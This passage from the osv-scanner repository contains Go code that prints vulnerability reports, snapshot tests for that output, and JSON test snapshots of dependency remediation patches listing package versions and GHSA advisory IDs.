layerCommand)) if layer.Count.AnalysisCount.Regular > 0 { fmt.Fprintf(out, " %s\n", text.FgRed.Sprintf("(%d vulns)", layer.Count.AnalysisCount.Regular)) } else { fmt.Fprintln(out) } } } fmt.Fprintln(out) } func printVerticalHeader(result SourceResult, out io.Writer) { fmt.Fprintf( out, "%s: found %s %s with issues\n", 
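text.FgMagenta.Sprintf("%s", result.Name), text.FgYellow.Sprintf("%d", result.PackageTypeCount.Regular), Form(result.PackageTypeCount.Regular, "package", "packages"), ) }

// printVerticalPackageContainerInfo writes the layer index in which pkg was
// introduced, followed by the base image name in parentheses when
// getBaseImageName returns a non-empty string, and terminates the line.
func printVerticalPackageContainerInfo(pkg PackageResult, out io.Writer) {
	baseImageName := getBaseImageName(pkg.LayerDetail.BaseImageInfo)

	fmt.Fprintf(out, " introduced in %s", text.FgCyan.Sprintf("# %d Layer", pkg.LayerDetail.LayerIndex))
	if baseImageName != "" {
		fmt.Fprintf(out, "%s", text.FgCyan.Sprintf(" (%s)", baseImageName))
	}
	fmt.Fprintln(out)
}

// printVerticalVulnerabilitiesCountSummary writes the one-line total for a
// source: "<count> <state> <vulnerability|vulnerabilities> found in <sourcePath>".
//
// state is "known" when printingCalled is true; otherwise it is
// "uncalled/unimportant" and the line is suffixed with " (filtered out)".
func printVerticalVulnerabilitiesCountSummary(count int, printingCalled bool, sourcePath string, out io.Writer) {
	state := "known"
	if !printingCalled {
		state = "uncalled/unimportant"
	}

	fmt.Fprintf(out, "\n %s",
		text.FgRed.Sprintf(
			"%d %s %s found in %s",
			count,
			state,
			Form(count, "vulnerability", "vulnerabilities"),
			sourcePath,
		),
	)

	if !printingCalled {
		fmt.Fprintf(out, "%s", text.FgRed.Sprint(" (filtered out)"))
	}

	fmt.Fprintln(out)
}

// printVerticalVulnerabilitiesForPackages writes one section per package that
// has at least one vulnerability in the selected list.
//
// When printingCalled is true the package's RegularVulns are listed and
// described as "known"; otherwise its HiddenVulns are listed and described with
// the lower-cased result of getFilteredVulnReasons. For OS results, the binary
// package names are appended when they differ from the source package name.
// When isContainerScanning is true the introducing layer is printed as well.
func printVerticalVulnerabilitiesForPackages(packages []PackageResult, out io.Writer, printingCalled bool, isContainerScanning bool, isOSResult bool) {
	for _, pkg := range packages {
		vulns := pkg.RegularVulns
		if !printingCalled {
			vulns = pkg.HiddenVulns
		}

		// Packages with nothing to report in the selected list are skipped entirely.
		if len(vulns) == 0 {
			continue
		}

		state := "known"
		if !printingCalled {
			state = strings.ToLower(getFilteredVulnReasons(vulns))
		}

		pkgSourceName := pkg.Name
		pkgName := strings.Join(pkg.OSPackageNames, ", ")
		pkgNameInfo := ""
		if isOSResult && pkgName != "" && pkgName != pkgSourceName {
			pkgNameInfo = fmt.Sprintf(" (binary %s: %s)", Form(len(pkg.OSPackageNames), "package", "packages"), pkgName)
		}

		fmt.Fprintf(out,
			" %s%s %s\n",
			text.FgYellow.Sprintf("%s@%s", pkgSourceName, pkg.InstalledVersion),
			text.FgYellow.Sprintf("%s", pkgNameInfo),
			text.FgRed.Sprintf("has the following %s vulnerabilities:", state),
		)

		if isContainerScanning {
			printVerticalPackageContainerInfo(pkg, out)
		}

		for _, vulnerability := range vulns {
			fmt.Fprintf(out,
				" %s %s\n",
				text.FgCyan.Sprintf("%s:", vulnerability.ID),
				describe(vulnerability),
			)
			fmt.Fprintf(out,
				" Severity: '%s'; Minimal Fix Version: '%s';\n",
				vulnerability.SeverityScore,
				vulnerability.FixedVersion,
			)
		}
	}
}

// printVerticalVulnerabilities writes the vulnerability report for one source.
//
// The Regular count drives the "known" section and the Hidden count drives the
// filtered section. Hidden vulnerabilities are listed in full only when
// showAllVulns is true; otherwise a single prompt from formatHiddenVulnsPrompt
// reports how many were held back, so the reader can tell that findings were
// suppressed rather than absent.
func printVerticalVulnerabilities(sourceResult SourceResult, isContainerScanning bool, out io.Writer, showAllVulns bool) {
	countCalled := sourceResult.VulnCount.AnalysisCount.Regular
	countUncalled := sourceResult.VulnCount.AnalysisCount.Hidden

	if countCalled == 0 && countUncalled == 0 {
		fmt.Fprintf(
			out,
			" %s\n",
			text.FgGreen.Sprintf("no known vulnerabilities found"),
		)

		return
	}

	if countCalled > 0 {
		fmt.Fprintln(out)
		printVerticalVulnerabilitiesForPackages(sourceResult.Packages, out, true, isContainerScanning, isOSResult(sourceResult.Type))
		printVerticalVulnerabilitiesCountSummary(countCalled, true, sourceResult.Name, out)
	}

	if showAllVulns && countUncalled > 0 {
		fmt.Fprintln(out)
		printVerticalVulnerabilitiesForPackages(sourceResult.Packages, out, false, isContainerScanning, isOSResult(sourceResult.Type))
		printVerticalVulnerabilitiesCountSummary(countUncalled, false, sourceResult.Name, out)
	}

	if !showAllVulns && countUncalled > 0 {
		fmt.Fprintln(out, formatHiddenVulnsPrompt(countUncalled))
	}
}

// truncate shortens str so that at most limit characters (runes) precede a
// trailing ellipsis.
//
// A string with fewer than limit runes is returned unchanged. Otherwise the
// string is cut at the last whitespace found within the first limit runes, to
// keep whole words; if there is none, it is cut right after the limit-th rune.
//
// The cut position is always a rune boundary. The limit is a rune count, while
// slicing uses byte offsets, so the two must not be mixed: using the rune count
// as a byte offset would split a multi-byte character and emit invalid UTF-8.
// A non-positive limit yields just the ellipsis for any non-empty string.
func truncate(str string, limit int) string {
	if limit <= 0 {
		if str == "" {
			return str
		}

		return "..."
	}

	runes := 0
	lastSpace := -1
	cut := -1

	for i, c := range str {
		if runes == limit {
			// i is the byte offset at which rune number limit+1 starts,
			// i.e. the end of the limit-th rune.
			cut = i
			break
		}
		if unicode.IsSpace(c) {
			lastSpace = i
		}
		runes++
	}

	if cut == -1 {
		if runes < limit {
			return str
		}
		// the string holds exactly limit runes; it is still given an ellipsis,
		// which matches how ASCII input of that length was handled before
		cut = len(str)
	}

	// ideally we want to keep words whole when truncating,
	// but if we can't find a space just truncate at the limit
	if lastSpace != -1 {
		cut = lastSpace
	}

	return str[:cut] + "..."
}

// describe returns the text shown next to a vulnerability ID: a placeholder
// when the record has no description, otherwise the description truncated to
// 80 characters.
//
// NOTE(review): Description is advisory-supplied text and, apart from the
// truncation, is passed through unchanged here; confirm that control and escape
// characters are stripped before it reaches a terminal.
func describe(vulnerability VulnResult) string {
	if vulnerability.Description == "" {
		return "(no details available)"
	}

	return truncate(vulnerability.Description, 80)
}

================================================
FILE: internal/output/vertical_test.go
================================================
package output_test

import (
	"bytes"
	"testing"

	"github.com/google/osv-scanner/v2/internal/output"
	"github.com/google/osv-scanner/v2/internal/testutility"
	"github.com/jedib0t/go-pretty/v6/text"
)

// TestPrintVerticalResults_WithVulnerabilities snapshots the vertical output,
// with escape sequences stripped, for the shared vulnerability test cases.
func TestPrintVerticalResults_WithVulnerabilities(t *testing.T) {
	t.Parallel()

	testOutputWithVulnerabilities(t, func(t *testing.T, args outputTestCaseArgs) {
		t.Helper()

		outputWriter := &bytes.Buffer{}
		output.PrintVerticalResults(args.vulnResult, outputWriter, true)

		testutility.NewSnapshot().MatchText(t, text.StripEscape(outputWriter.String()))
	})
}

// TestPrintVerticalResults_WithLicenseViolations snapshots the vertical output,
// with escape sequences stripped, for the shared license-violation test cases.
func TestPrintVerticalResults_WithLicenseViolations(t *testing.T) {
	t.Parallel()

	testOutputWithLicenseViolations(t, func(t *testing.T, args outputTestCaseArgs) {
		t.Helper()

		outputWriter := &bytes.Buffer{}
		output.PrintVerticalResults(args.vulnResult, outputWriter, false)

		testutility.NewSnapshot().MatchText(t, text.StripEscape(outputWriter.String()))
	})
}

// TestPrintVerticalResults_WithMixedIssues snapshots the vertical output, with
// escape sequences stripped, for the shared mixed-issue test cases.
func TestPrintVerticalResults_WithMixedIssues(t *testing.T) {
	t.Parallel()

	testOutputWithMixedIssues(t, func(t *testing.T, args outputTestCaseArgs) {
		t.Helper()

		outputWriter := &bytes.Buffer{}
		output.PrintVerticalResults(args.vulnResult, outputWriter, false)

		testutility.NewSnapshot().MatchText(t, text.StripEscape(outputWriter.String()))
	})
}

================================================
FILE: internal/remediation/__snapshots__/in_place_test.snap
================================================
[TestComputeInPlacePatches/npm-santatracker - 1]
{ "Patches": [ { "Patch": { "Pkg": { "System": 3, "Name": "lodash" }, "OrigVersion": "4.17.20", "NewVersion": "4.17.21" },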
"Resolved": [ { "ID": "GHSA-29mw-wpgm-hmr9", "AffectedNodes": [ 338 ] }, { "ID": "GHSA-35jh-r3h4-6jhm", "AffectedNodes": [ 338 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "minimist" }, "OrigVersion": "1.2.0", "NewVersion": "1.2.8" }, "Resolved": [ { "ID": "GHSA-vh95-rmgr-6w4m", "AffectedNodes": [ 357 ] }, { "ID": "GHSA-xvch-5gv4-984h", "AffectedNodes": [ 357 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "ws" }, "OrigVersion": "6.2.1", "NewVersion": "6.2.3" }, "Resolved": [ { "ID": "GHSA-3h5v-q93c-6h6q", "AffectedNodes": [ 513 ] }, { "ID": "GHSA-6fc8-4gx4-v693", "AffectedNodes": [ 513 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "ws" }, "OrigVersion": "7.1.2", "NewVersion": "7.5.10" }, "Resolved": [ { "ID": "GHSA-3h5v-q93c-6h6q", "AffectedNodes": [ 609 ] }, { "ID": "GHSA-6fc8-4gx4-v693", "AffectedNodes": [ 609 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "acorn" }, "OrigVersion": "5.7.3", "NewVersion": "5.4.1" }, "Resolved": [ { "ID": "GHSA-6chw-6frg-f759", "AffectedNodes": [ 620 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "acorn" }, "OrigVersion": "6.0.2", "NewVersion": "6.4.2" }, "Resolved": [ { "ID": "GHSA-6chw-6frg-f759", "AffectedNodes": [ 133, 649 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "acorn" }, "OrigVersion": "7.1.0", "NewVersion": "7.4.1" }, "Resolved": [ { "ID": "GHSA-6chw-6frg-f759", "AffectedNodes": [ 595 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "ansi-regex" }, "OrigVersion": "3.0.0", "NewVersion": "3.0.1" }, "Resolved": [ { "ID": "GHSA-93q8-gq69-wqmw", "AffectedNodes": [ 564, 644 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "brace-expansion" }, "OrigVersion": "1.1.11", "NewVersion": "1.1.12" }, "Resolved": [ { "ID": "GHSA-v6h2-p8h4-qcjw", "AffectedNodes": [ 162 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "cross-spawn" }, "OrigVersion": "6.0.5", "NewVersion": "6.0.6" }, "Resolved": [ { "ID": "GHSA-3xgq-45jj-v275", "AffectedNodes": [ 203 ] } ] }, { "Patch": { "Pkg": { "System": 3, 
"Name": "dat.gui" }, "OrigVersion": "0.7.3", "NewVersion": "0.7.9" }, "Resolved": [ { "ID": "GHSA-chwr-hf3w-c984", "AffectedNodes": [ 208 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "get-func-name" }, "OrigVersion": "2.0.0", "NewVersion": "2.0.2" }, "Resolved": [ { "ID": "GHSA-4q6p-r6v2-jvc5", "AffectedNodes": [ 264 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "glob-parent" }, "OrigVersion": "5.0.0", "NewVersion": "5.1.2" }, "Resolved": [ { "ID": "GHSA-ww39-953v-wcq6", "AffectedNodes": [ 269 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "json5" }, "OrigVersion": "2.1.0", "NewVersion": "2.2.3" }, "Resolved": [ { "ID": "GHSA-9c47-m6qq-7p4h", "AffectedNodes": [ 329 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "minimist" }, "OrigVersion": "1.2.5", "NewVersion": "1.2.8" }, "Resolved": [ { "ID": "GHSA-xvch-5gv4-984h", "AffectedNodes": [ 580 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "node-fetch" }, "OrigVersion": "2.6.6", "NewVersion": "2.7.0" }, "Resolved": [ { "ID": "GHSA-r683-j2x4-v87g", "AffectedNodes": [ 586, 591, 634 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "path-parse" }, "OrigVersion": "1.0.6", "NewVersion": "1.0.7" }, "Resolved": [ { "ID": "GHSA-hj48-42vr-x3v9", "AffectedNodes": [ 398 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "pathval" }, "OrigVersion": "1.1.0", "NewVersion": "1.1.1" }, "Resolved": [ { "ID": "GHSA-g6ww-v8xp-vmwg", "AffectedNodes": [ 400 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "qs" }, "OrigVersion": "6.5.2", "NewVersion": "6.5.3" }, "Resolved": [ { "ID": "GHSA-hrpp-h998-j3pp", "AffectedNodes": [ 422 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "rollup" }, "OrigVersion": "2.59.0", "NewVersion": "2.79.2" }, "Resolved": [ { "ID": "GHSA-gcx4-mw62-g8wm", "AffectedNodes": [ 444 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "semver" }, "OrigVersion": "5.5.1", "NewVersion": "5.7.2" }, "Resolved": [ { "ID": "GHSA-c2qf-rxjj-qqgw", "AffectedNodes": [ 449 ] } ] }, { "Patch": { 
"Pkg": { "System": 3, "Name": "semver" }, "OrigVersion": "5.6.0", "NewVersion": "5.7.2" }, "Resolved": [ { "ID": "GHSA-c2qf-rxjj-qqgw", "AffectedNodes": [ 539, 572 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "semver" }, "OrigVersion": "6.3.0", "NewVersion": "6.3.1" }, "Resolved": [ { "ID": "GHSA-c2qf-rxjj-qqgw", "AffectedNodes": [ 571 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "y18n" }, "OrigVersion": "4.0.0", "NewVersion": "4.0.3" }, "Resolved": [ { "ID": "GHSA-c4w7-xm78-47vh", "AffectedNodes": [ 518 ] } ] } ], "Unfixable": [ { "ID": "GHSA-2r2c-g63r-vccr", "AffectedNodes": [ 366 ] }, { "ID": "GHSA-3wf4-68gx-mph8", "AffectedNodes": [ 255 ] }, { "ID": "GHSA-3xgq-45jj-v275", "AffectedNodes": [ 575 ] }, { "ID": "GHSA-4wf5-vphf-c2xc", "AffectedNodes": [ 470 ] }, { "ID": "GHSA-52f5-9888-hmc6", "AffectedNodes": [ 472 ] }, { "ID": "GHSA-566m-qj78-rww5", "AffectedNodes": [ 406 ] }, { "ID": "GHSA-5rrq-pxf6-6jx5", "AffectedNodes": [ 366 ] }, { "ID": "GHSA-67hx-6x53-jw92", "AffectedNodes": [ 71 ] }, { "ID": "GHSA-72xf-g2v4-qvf3", "AffectedNodes": [ 475 ] }, { "ID": "GHSA-72xf-g2v4-qvf3", "AffectedNodes": [ 607 ] }, { "ID": "GHSA-72xf-g2v4-qvf3", "AffectedNodes": [ 652 ] }, { "ID": "GHSA-7fh5-64p2-3v2j", "AffectedNodes": [ 406 ] }, { "ID": "GHSA-7v5v-9h63-cj86", "AffectedNodes": [ 109 ] }, { "ID": "GHSA-896r-f27r-55mw", "AffectedNodes": [ 326 ] }, { "ID": "GHSA-8fr3-hfg3-gpgp", "AffectedNodes": [ 366 ] }, { "ID": "GHSA-968p-4wvh-cqc8", "AffectedNodes": [ 24 ] }, { "ID": "GHSA-9wv6-86v2-598j", "AffectedNodes": [ 399 ] }, { "ID": "GHSA-cfm4-qjh2-4765", "AffectedNodes": [ 366 ] }, { "ID": "GHSA-f8q6-p94x-37v3", "AffectedNodes": [ 356 ] }, { "ID": "GHSA-fjxv-7rqg-78g4", "AffectedNodes": [ 257 ] }, { "ID": "GHSA-g954-5hwp-pp24", "AffectedNodes": [ 415 ] }, { "ID": "GHSA-gcx4-mw62-g8wm", "AffectedNodes": [ 605 ] }, { "ID": "GHSA-gf8q-jrpm-jvxq", "AffectedNodes": [ 366 ] }, { "ID": "GHSA-grv7-fg5c-xmjg", "AffectedNodes": [ 163 ] }, { "ID": "GHSA-h755-8qp9-cq85", 
"AffectedNodes": [ 415 ] }, { "ID": "GHSA-hwj9-h5mp-3pm3", "AffectedNodes": [ 406 ] }, { "ID": "GHSA-p8p7-x288-28g6", "AffectedNodes": [ 436 ] }, { "ID": "GHSA-p9pc-299p-vxgp", "AffectedNodes": [ 521 ] }, { "ID": "GHSA-pfq8-rq6v-vf5m", "AffectedNodes": [ 291 ] }, { "ID": "GHSA-r683-j2x4-v87g", "AffectedNodes": [ 365 ] }, { "ID": "GHSA-v88g-cgmw-v5xw", "AffectedNodes": [ 138 ] }, { "ID": "GHSA-vh5w-fg69-rc8m", "AffectedNodes": [ 278 ] }, { "ID": "GHSA-vh95-rmgr-6w4m", "AffectedNodes": [ 615 ] }, { "ID": "GHSA-w8qv-6jwh-64r5", "AffectedNodes": [ 166 ] }, { "ID": "GHSA-w8qv-6jwh-64r5", "AffectedNodes": [ 560 ] }, { "ID": "GHSA-x4jg-mjrx-434g", "AffectedNodes": [ 366 ] }, { "ID": "GHSA-xvch-5gv4-984h", "AffectedNodes": [ 615 ] } ] } --- ================================================ FILE: internal/remediation/__snapshots__/testhelpers_test.snap ================================================ [TestComputeOverridePatches/maven-classifier - 1] [ { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.commons:commons-lang3" }, "Type": {}, "OrigRequire": "", "NewRequire": "3.18.0", "OrigResolved": "3.5", "NewResolved": "3.18.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-j288-q9x7-2f5v", "AffectedNodes": [ 2 ] } ], "AddedVulns": [] } ] --- [TestComputeOverridePatches/maven-management-only - 1] [ { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.commons:commons-configuration2" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.10.1", "OrigResolved": "2.8.0", "NewResolved": "2.10.1" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-9w38-p64v-xpmv", "AffectedNodes": [ 16 ] }, { "ID": "GHSA-xjp4-hw94-mvp5", "AffectedNodes": [ 16 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.shiro:shiro-web" }, "Type": {}, "OrigRequire": "", "NewRequire": "1.13.0", "OrigResolved": "1.10.0", "NewResolved": "1.13.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": 
"GHSA-hhw5-c326-822h", "AffectedNodes": [ 23 ] }, { "ID": "GHSA-pmhc-2g4f-85cg", "AffectedNodes": [ 23 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "commons-io:commons-io" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.14.0", "OrigResolved": "2.7", "NewResolved": "2.14.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-78wr-2p64-hpwj", "AffectedNodes": [ 19 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.shiro:shiro-core" }, "Type": {}, "OrigRequire": "", "NewRequire": "1.13.0", "OrigResolved": "1.10.0", "NewResolved": "1.13.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-jc7h-c423-mpjc", "AffectedNodes": [ 22 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.shiro:shiro-web" }, "Type": {}, "OrigRequire": "", "NewRequire": "1.12.0", "OrigResolved": "1.10.0", "NewResolved": "1.12.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-pmhc-2g4f-85cg", "AffectedNodes": [ 23 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.thrift:libthrift" }, "Type": {}, "OrigRequire": "", "NewRequire": "0.14.0", "OrigResolved": "0.13.0", "NewResolved": "0.14.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-g2fg-mr77-6vrm", "AffectedNodes": [ 6 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.commons:commons-lang3" }, "Type": {}, "OrigRequire": "", "NewRequire": "3.18.0", "OrigResolved": "3.12.0", "NewResolved": "3.18.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [], "AddedVulns": [] } ] --- [TestComputeOverridePatches/maven-zeppelin-server - 1] [ { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.zeppelin:zeppelin-interpreter" }, "Type": {}, "OrigRequire": "", "NewRequire": "0.12.0", "OrigResolved": "0.11.1", "NewResolved": "0.12.0" } ], "EcosystemSpecific": null }, 
"RemovedVulns": [ { "ID": "GHSA-2fqw-684c-pvp7", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-389x-839f-4rhx", "AffectedNodes": [ 278 ] }, { "ID": "GHSA-3p8m-j85q-pgmj", "AffectedNodes": [ 256 ] }, { "ID": "GHSA-4jhc-wjr3-pwh2", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-5mg8-w23w-74h3", "AffectedNodes": [ 260 ] }, { "ID": "GHSA-6mjq-h674-j845", "AffectedNodes": [ 257 ] }, { "ID": "GHSA-6vvh-5794-vpmj", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-7fr2-94h7-ccg2", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-7g45-4rm6-3mm3", "AffectedNodes": [ 260 ] }, { "ID": "GHSA-7pgf-ppxw-8624", "AffectedNodes": [ 39 ] }, { "ID": "GHSA-g7p8-r2ch-4rmf", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-m4h3-7mc2-v295", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-mf27-wg66-m8f5", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-mm9x-g8pc-w292", "AffectedNodes": [ 257 ] }, { "ID": "GHSA-mvr2-9pj6-7w5j", "AffectedNodes": [ 260 ] }, { "ID": "GHSA-xq3w-v528-46rv", "AffectedNodes": [ 278 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "io.atomix:atomix" }, "Type": {}, "OrigRequire": "", "NewRequire": "3.1.6", "OrigResolved": "3.0.0-rc5", "NewResolved": "3.1.6" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-2fqw-684c-pvp7", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-4jhc-wjr3-pwh2", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-6vvh-5794-vpmj", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-7fr2-94h7-ccg2", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-g7p8-r2ch-4rmf", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-m4h3-7mc2-v295", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-mf27-wg66-m8f5", "AffectedNodes": [ 123 ] } ], "AddedVulns": [ { "ID": "GHSA-v2xm-76pq-phcf", "AffectedNodes": [ 264 ] } ] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "io.netty:netty-handler" }, "Type": {}, "OrigRequire": "", "NewRequire": "4.1.118.Final", "OrigResolved": "4.1.27.Final", "NewResolved": "4.1.118.Final" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": 
"GHSA-389x-839f-4rhx", "AffectedNodes": [ 278 ] }, { "ID": "GHSA-6mjq-h674-j845", "AffectedNodes": [ 257 ] }, { "ID": "GHSA-mm9x-g8pc-w292", "AffectedNodes": [ 257 ] }, { "ID": "GHSA-xq3w-v528-46rv", "AffectedNodes": [ 278 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.pdfbox:pdfbox" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.0.24", "OrigResolved": "2.0.16", "NewResolved": "2.0.24" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-2h3j-m7gr-25xj", "AffectedNodes": [ 287 ] }, { "ID": "GHSA-6vqp-h455-42mr", "AffectedNodes": [ 287 ] }, { "ID": "GHSA-7grw-6pjh-jpc9", "AffectedNodes": [ 287 ] }, { "ID": "GHSA-fg3j-q579-v8x4", "AffectedNodes": [ 287 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "xerces:xercesImpl" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.12.2", "OrigResolved": "2.11.0", "NewResolved": "2.12.2" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-7j4h-8wpf-rqfh", "AffectedNodes": [ 252 ] }, { "ID": "GHSA-h65f-jvqw-m9fj", "AffectedNodes": [ 252 ] }, { "ID": "GHSA-vmqm-g3vh-847m", "AffectedNodes": [ 252 ] }, { "ID": "GHSA-w4jq-qh47-hvjq", "AffectedNodes": [ 252 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "io.atomix:atomix" }, "Type": {}, "OrigRequire": "", "NewRequire": "3.1.6", "OrigResolved": "3.0.0-rc5", "NewResolved": "3.1.6" }, { "Pkg": { "System": 6, "Name": "io.github.classgraph:classgraph" }, "Type": {}, "OrigRequire": "", "NewRequire": "4.8.112", "OrigResolved": "4.2.3", "NewResolved": "4.8.112" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-2fqw-684c-pvp7", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-4jhc-wjr3-pwh2", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-6vvh-5794-vpmj", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-7fr2-94h7-ccg2", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-g7p8-r2ch-4rmf", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-m4h3-7mc2-v295", "AffectedNodes": 
[ 123 ] }, { "ID": "GHSA-mf27-wg66-m8f5", "AffectedNodes": [ 123 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "com.google.guava:guava" }, "Type": {}, "OrigRequire": "", "NewRequire": "32.0.0-jre", "OrigResolved": "22.0", "NewResolved": "32.0.0-jre" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-5mg8-w23w-74h3", "AffectedNodes": [ 260 ] }, { "ID": "GHSA-7g45-4rm6-3mm3", "AffectedNodes": [ 260 ] }, { "ID": "GHSA-mvr2-9pj6-7w5j", "AffectedNodes": [ 260 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "io.netty:netty-codec" }, "Type": {}, "OrigRequire": "", "NewRequire": "4.1.125.Final", "OrigResolved": "4.1.27.Final", "NewResolved": "4.1.125.Final" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-389x-839f-4rhx", "AffectedNodes": [ 278 ] }, { "ID": "GHSA-3p8m-j85q-pgmj", "AffectedNodes": [ 256 ] }, { "ID": "GHSA-xq3w-v528-46rv", "AffectedNodes": [ 278 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.mina:mina-core" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.0.27", "OrigResolved": "2.0.7", "NewResolved": "2.0.27" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-5h29-qq92-wj7f", "AffectedNodes": [ 167 ] }, { "ID": "GHSA-6mcm-j9cj-3vc3", "AffectedNodes": [ 167 ] }, { "ID": "GHSA-76h9-2vwh-w278", "AffectedNodes": [ 167 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.eclipse.jgit:org.eclipse.jgit" }, "Type": {}, "OrigRequire": "", "NewRequire": "6.10.1.202505221210-r", "OrigResolved": "4.5.4.201711221230-r", "NewResolved": "6.10.1.202505221210-r" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-3p86-9955-h393", "AffectedNodes": [ 56 ] }, { "ID": "GHSA-q446-82vq-w674", "AffectedNodes": [ 151 ] }, { "ID": "GHSA-vrpq-qp53-qv56", "AffectedNodes": [ 56 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": 
"xerces:xercesImpl" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.12.1", "OrigResolved": "2.11.0", "NewResolved": "2.12.1" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-7j4h-8wpf-rqfh", "AffectedNodes": [ 252 ] }, { "ID": "GHSA-vmqm-g3vh-847m", "AffectedNodes": [ 252 ] }, { "ID": "GHSA-w4jq-qh47-hvjq", "AffectedNodes": [ 252 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "com.fasterxml.jackson.core:jackson-core" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.15.0", "OrigResolved": "2.12.6", "NewResolved": "2.15.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-h46c-h94j-95f3", "AffectedNodes": [ 78 ] }, { "ID": "GHSA-wf8f-6423-gfxg", "AffectedNodes": [ 78 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "com.fasterxml.jackson.core:jackson-databind" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.12.7.1", "OrigResolved": "2.12.6.1", "NewResolved": "2.12.7.1" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": 